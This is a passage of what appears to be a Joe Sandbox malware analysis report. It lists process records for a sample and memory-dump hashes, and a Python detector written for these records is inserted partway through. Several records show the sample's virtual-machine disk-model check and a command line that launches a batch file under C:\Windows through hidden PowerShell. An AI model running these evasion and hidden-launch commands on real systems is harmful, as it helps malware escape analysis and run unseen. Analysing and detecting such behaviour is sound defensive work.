                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:85
                                                                                                                                                        Start time:18:25:17
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
                                                                                                                                                        Imagebase:0x7ff70c3f0000
                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:86
                                                                                                                                                        Start time:18:25:19
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:87
                                                                                                                                                        Start time:18:25:20
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:88
                                                                                                                                                        Start time:18:25:21
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:wmic diskdrive get Model
                                                                                                                                                        Imagebase:0x7ff696f50000
                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:89
                                                                                                                                                        Start time:18:25:21
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
                                                                                                                                                        Imagebase:0x7ff70c3f0000
                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:90
                                                                                                                                                        Start time:18:25:22
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:91
                                                                                                                                                        Start time:18:25:22
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:92
                                                                                                                                                        Start time:18:25:22
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:93
                                                                                                                                                        Start time:18:25:22
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

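The process entries above show two behaviours worth turning into detection logic: a VM check split across two processes (wmic diskdrive get Model, then findstr for "QEMU HARDDISK" and two other disk-model strings), and a hidden PowerShell launch of a batch file living under C:\Windows, driven by cmd.exe echoing a Start-Process line into powershell.exe -WindowStyle Hidden. The Python below is an added example, not part of the Joe Sandbox report or the sample; it parses records in the report's own Key:value layout (the sample records are constructed here, with the Commandline values taken from the entries above) and flags both patterns. The rule names, the correlation across records and the regexes are this example's own choices; WDS100T2B0A and DADY HARDDISK are treated as nothing more than the strings the sample greps for.

```python
import re
from typing import Dict, List, Tuple

# Constructed input in the report's Key:value layout; Commandline values are
# copied from the process list above, the remaining fields are trimmed.
SAMPLE_RECORDS = """\
Target ID:88
Path:C:\\Windows\\System32\\wbem\\WMIC.exe
Commandline:wmic diskdrive get Model
Has elevated privileges:true

Target ID:89
Path:C:\\Windows\\System32\\findstr.exe
Commandline:findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Has elevated privileges:true

Target ID:90
Path:C:\\Windows\\System32\\cmd.exe
Commandline:"C:\\Windows\\system32\\cmd.exe" /c echo Start-Process -FilePath 'C:\\Windows\\$rbx-onimai2\\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Has elevated privileges:false

Target ID:93
Path:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Commandline:powershell.exe -WindowStyle Hidden
Has elevated privileges:false

Target ID:91
Path:C:\\Windows\\System32\\conhost.exe
Commandline:C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1
Has elevated privileges:false
"""

# Disk-model strings the sample greps for. QEMU HARDDISK is the default disk
# model under QEMU/KVM; the other two are taken verbatim from the findstr line.
VM_DISK_MARKERS = ("QEMU HARDDISK", "DADY HARDDISK", "WDS100T2B0A")

DISK_ENUM_RE = re.compile(r"\bwmic\b.*\bdiskdrive\b.*\bmodel\b", re.I)
FINDSTR_RE = re.compile(r"\bfindstr(\.exe)?\b", re.I)
# cmd echoing a Start-Process line into a hidden PowerShell via stdin.
HIDDEN_PIPE_RE = re.compile(
    r"echo\s+start-process\b.*\|\s*powershell(\.exe)?\s+-windowstyle\s+hidden", re.I)
# A .bat launched from anywhere below <drive>:\Windows\ (hypothetical rule).
BAT_IN_WINDOWS_RE = re.compile(r"[a-z]:\\windows\\[\w$.\\-]+\.bat", re.I)

Finding = Tuple[str, str, str]  # (Target ID, rule name, detail)


def parse_records(text: str) -> List[Dict[str, str]]:
    """Split blank-line separated Key:value blocks; only the first ':' splits,
    so paths and command lines containing colons survive intact."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")
            if sep:
                rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records


def scan(text: str) -> List[Finding]:
    """Return findings for every record whose command line matches a rule.
    The disk-model check is scored higher when a wmic diskdrive enumeration
    is present anywhere in the same record set, since the two halves of the
    check run in separate processes."""
    records = parse_records(text)
    cmds = [r.get("Commandline", "") for r in records]
    disk_enum_seen = any(DISK_ENUM_RE.search(c) for c in cmds)
    findings: List[Finding] = []
    for rec in records:
        tid, cmd = rec.get("Target ID", "?"), rec.get("Commandline", "")
        hits = [m for m in VM_DISK_MARKERS if m.lower() in cmd.lower()]
        if FINDSTR_RE.search(cmd) and hits:
            detail = "findstr for " + ", ".join(hits)
            if disk_enum_seen:
                detail += " (wmic diskdrive get Model seen in the same tree)"
            findings.append((tid, "vm_disk_model_check", detail))
        if HIDDEN_PIPE_RE.search(cmd):
            findings.append((tid, "hidden_powershell_launch",
                             "cmd echoes Start-Process into powershell -WindowStyle Hidden"))
        m = BAT_IN_WINDOWS_RE.search(cmd)
        if m:
            findings.append((tid, "batch_under_windows_dir", m.group(0)))
    return findings


if __name__ == "__main__":
    for tid, rule, detail in scan(SAMPLE_RECORDS):
        print(f"Target {tid}: {rule}: {detail}")
```

Two points the records make and the detector reflects: the findstr process on its own only shows three disk-model strings, so a rule keyed on a single command line should be corroborated by the wmic diskdrive enumeration in the same tree; and the PowerShell process (Target 93) carries no script on its command line because the Start-Process line arrived over stdin from cmd.exe, so the hidden-launch rule has to fire on the cmd.exe parent, not on powershell.exe.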
Target ID:94
Start time:18:25:24
Start date:07/10/2024
Path:C:\Windows\System32\dllhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\dllhost.exe /Processid:{b07a7a50-b27b-4e63-a696-921ea5101b06}
Imagebase:0x7ff6f7fc0000
File size:21'312 bytes
MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:95
Start time:18:25:24
Start date:07/10/2024
Path:C:\Windows\System32\dllhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\dllhost.exe /Processid:{2b935158-6528-4027-b9d5-aa7c0cf2c1f6}
Imagebase:0x7ff6f7fc0000
File size:21'312 bytes
MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:96
Start time:18:25:24
Start date:07/10/2024
Path:C:\Windows\System32\dllhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\dllhost.exe /Processid:{2754d8d4-2c6c-4f8b-b189-8df08fdb6662}
Imagebase:0x7ff6f7fc0000
File size:21'312 bytes
MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:97
Start time:18:25:24
Start date:07/10/2024
Path:C:\Windows\System32\dllhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\dllhost.exe /Processid:{c189289e-8452-4651-b13f-f89ff87f8bfd}
Imagebase:0x7ff6f7fc0000
File size:21'312 bytes
MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:98
Start time:18:25:25
Start date:07/10/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Imagebase:0x7ff6794d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:99
Start time:18:25:25
Start date:07/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:100
                                                                                                                                                        Start time:18:25:25
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:wmic diskdrive get Model
                                                                                                                                                        Imagebase:0x7ff696f50000
                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:101
                                                                                                                                                        Start time:18:25:25
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\winlogon.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:winlogon.exe
                                                                                                                                                        Imagebase:0x7ff779b10000
                                                                                                                                                        File size:906'240 bytes
                                                                                                                                                        MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:102
                                                                                                                                                        Start time:18:25:25
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
                                                                                                                                                        Imagebase:0x7ff70c3f0000
                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:103
                                                                                                                                                        Start time:18:25:26
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\lsass.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\lsass.exe
                                                                                                                                                        Imagebase:0x7ff6afc30000
                                                                                                                                                        File size:59'456 bytes
                                                                                                                                                        MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

Strings

Memory Dump Source
• Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
Similarity
• API ID:
• String ID: P Q
• API String ID: 0-437629538
• Opcode ID: e3845140bd3cf7c2e10184745c9932d9389c21fe4dd4b185c3b51b911a2038f0
• Instruction ID: dc3d2756e9d06fe6b8ba764bae63e252fab982977dc73d5933cef4884439cef0
• Opcode Fuzzy Hash: e3845140bd3cf7c2e10184745c9932d9389c21fe4dd4b185c3b51b911a2038f0
• Instruction Fuzzy Hash: CA124530A18A494FE75CEF2D8484635B7D2FF9835579482BED44ACB29BDE74E8438780

Memory Dump Source
• Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5db4c59eda1212bb86f1d3dc27be0bee33c8ca41ced76c650d2cb6b069714f30
• Instruction ID: 7b6a6ec3453a5668da040a776c83b05857332802163e916160f7d629c91f2b99
• Opcode Fuzzy Hash: 5db4c59eda1212bb86f1d3dc27be0bee33c8ca41ced76c650d2cb6b069714f30
• Instruction Fuzzy Hash: 9E62C270618A098FE718EE18C4849B5B3E2FF95365BA0467DD08BC7296DE35F943C790

Memory Dump Source
• Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7169f7000c85a0bf654698275edcaeef1125dff971523bff4149f97b73e22ef8
• Instruction ID: cc9353cc08d6f96626ef16af3fa919550d960d82f10f6b78f7d2f532457a334f
• Opcode Fuzzy Hash: 7169f7000c85a0bf654698275edcaeef1125dff971523bff4149f97b73e22ef8
• Instruction Fuzzy Hash: B1F14331A18A454FE75CEF2D8885135B7D2FF8835579483BEC48ACB29BDE74E8038690

Memory Dump Source
• Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7a1df291f7558949af969b8681f43c7622073e7dbe3d5f1f13d49561b8466a02
• Instruction ID: 5f46e17cda7dbb86c66c98800341ab5a6e9f69ff63bb788d313de11536d6cd93
• Opcode Fuzzy Hash: 7a1df291f7558949af969b8681f43c7622073e7dbe3d5f1f13d49561b8466a02
• Instruction Fuzzy Hash: FBC1C030B18A098FE784FA698859B75B7D2EF99391FA441B9E10EC33D3CD68BC418751

Strings

Memory Dump Source
• Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
Similarity
• API ID:
• String ID: gfff
• API String ID: 0-1553575800
• Opcode ID: 8aed8d0868ba01e27b0e02187fc248d4da18517d7eaa27a1560a7a0c3c945940
• Instruction ID: 5108029a5641b32a99d361969a17efe38bafc91e69ddb4ca36827ffde16941e6
• Opcode Fuzzy Hash: 8aed8d0868ba01e27b0e02187fc248d4da18517d7eaa27a1560a7a0c3c945940
• Instruction Fuzzy Hash: E0614B70A1DA454FE309EB3888452A5F7E1FF9A351F8442BED08AC72D3DD68F9428781

Memory Dump Source
• Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 564d6ca6157bb01c6dc10a04e14fca4b26b360d20125e5ece33d26b72bc4fee8
• Instruction ID: 73dae3bde1ae9a201f2293500e027c33fc8c51e8fbfd0960eb08c613386e103b
• Opcode Fuzzy Hash: 564d6ca6157bb01c6dc10a04e14fca4b26b360d20125e5ece33d26b72bc4fee8
• Instruction Fuzzy Hash: 2CA1C2B0B18A868FE749AB3484546A2F7A1FF54355F4446BAD04FC3783DE28B516CB81

Memory Dump Source
• Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d6c565fbe7c5f0f8f0eac4e6595f3a9d8a43ca3a6a79000dc8dfef86c864c0c
• Instruction ID: 44039aab2f8e28a5d99356ffbdf0c2e744fcf738af185b3d47c9b99fc1cd7f33
• Opcode Fuzzy Hash: 5d6c565fbe7c5f0f8f0eac4e6595f3a9d8a43ca3a6a79000dc8dfef86c864c0c
• Instruction Fuzzy Hash: 2D81B070618A098FD75CFE18C485875B3E2FFA6365BA0467CD08B87296DE25F983C790

Memory Dump Source
• Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 00d4a853776beaef688f83a0b9a55d3d021b9e76ae0b584eeec3de7328cb4ad7
• Instruction ID: d2700492049ee5fab6f852d5d8cc019e9b3f27caa2a5ac9bfaf22e045df545fd
• Opcode Fuzzy Hash: 00d4a853776beaef688f83a0b9a55d3d021b9e76ae0b584eeec3de7328cb4ad7
• Instruction Fuzzy Hash: 04818170B18A058FE784FA6D8859B79F2C2EF99791FA481B9D10EC33D3CD68BC418651

Memory Dump Source
• Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 361828c04ba5bf04d800069550cf66dbe179179230f52710fdafefa3473e73da
• Instruction ID: 8d890863c4ddaa27b44d60bf5342a5b4e29d9458552f954d4bed15d2c7a0a605
• Opcode Fuzzy Hash: 361828c04ba5bf04d800069550cf66dbe179179230f52710fdafefa3473e73da
• Instruction Fuzzy Hash: C3510370618B098FE719EF18C4949B1B3A2FFA9354BA006BCC14BC76A1DE75F942CB50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bfb68c640a3f81edf212fef117361bdb23fbfa68e4cce094856164b058a4fa30
                                                                                                                                                          • Instruction ID: eacefee683da06afd6ba4537773ff5019b2db84f043420842bf25aa085379e52
                                                                                                                                                          • Opcode Fuzzy Hash: bfb68c640a3f81edf212fef117361bdb23fbfa68e4cce094856164b058a4fa30
                                                                                                                                                          • Instruction Fuzzy Hash: AA41FD30A1CA0D4FE798FB288454674B7D2EF893A0FA405BAD44EC32D7DE69AC428350
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0cccb44d8c8f0adde91754c081dbed207a8566faebec0273ed11457d8ec81d13
                                                                                                                                                          • Instruction ID: b640dbbc84624cc53059ab80ad410ad4049a9410f35fd0b9604fca997affdd3e
                                                                                                                                                          • Opcode Fuzzy Hash: 0cccb44d8c8f0adde91754c081dbed207a8566faebec0273ed11457d8ec81d13
                                                                                                                                                          • Instruction Fuzzy Hash: 91412F70A189498FDB88FF5CD459AACB7E2FF98361F444179E00DC3292DE64AC428755
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 492b7d5ff606055f08251a990311b3a8fe592741ad4900e7a2d7685821784c5c
                                                                                                                                                          • Instruction ID: 194e90a0b5f7185b88cdff4d78fd63162656a7b2af68a853114b12a62e6409aa
                                                                                                                                                          • Opcode Fuzzy Hash: 492b7d5ff606055f08251a990311b3a8fe592741ad4900e7a2d7685821784c5c
                                                                                                                                                          • Instruction Fuzzy Hash: BE21A211F0CD1D0BE398BD6C28653BDE2C2EB886A2FD4427EE14EC32C7DC989D464295
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c0f0938553e80f6cb61ba6871d5058e8fa2ef2606e2a566ae3ee1586eaf79202
                                                                                                                                                          • Instruction ID: 1f7e570881445453fcbdf448c8fb73383e83c95f1420ca5a95c3bb6d2929ce80
                                                                                                                                                          • Opcode Fuzzy Hash: c0f0938553e80f6cb61ba6871d5058e8fa2ef2606e2a566ae3ee1586eaf79202
                                                                                                                                                          • Instruction Fuzzy Hash: AF113A6140DA992FE31ABA65DC4E8B3BF98DF9727075401BEE48983163E5862842C3B1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fc528477448575a5c233d8a5993078bae221e7dd4ad14c65018d189f9c9e430a
                                                                                                                                                          • Instruction ID: 988c65da75b3fffa5a43240b67c7b93fc2f8e14c8b3ec22ffc12f82bed69187f
                                                                                                                                                          • Opcode Fuzzy Hash: fc528477448575a5c233d8a5993078bae221e7dd4ad14c65018d189f9c9e430a
                                                                                                                                                          • Instruction Fuzzy Hash: 2201493180DAD81FC3915B24881CAB67FE4EF46350F4902BBD449CB191DD6869058390
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b3a8835f1bd203fcf37e64be9982396813196e64fd91056c322eb5b3c89f32b5
                                                                                                                                                          • Instruction ID: bc07e3f64bac3c9e766eb54e08962cb8d99f86feb3831f70c1376bf13ce4de6e
                                                                                                                                                          • Opcode Fuzzy Hash: b3a8835f1bd203fcf37e64be9982396813196e64fd91056c322eb5b3c89f32b5
                                                                                                                                                          • Instruction Fuzzy Hash: 8EF0F671D09B454FC7615B396C540927BF0EA9666038807BBD08AC7286ED2499478790
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 85b3f4289beeb798e209dae9aff40a7aa4c84bbab099b34207d79b6a6914d1c8
                                                                                                                                                          • Instruction ID: 919b38ed310ea27db3b40d4f254d90a95ec1c9d145f2f8a573ea844cb04aa516
                                                                                                                                                          • Opcode Fuzzy Hash: 85b3f4289beeb798e209dae9aff40a7aa4c84bbab099b34207d79b6a6914d1c8
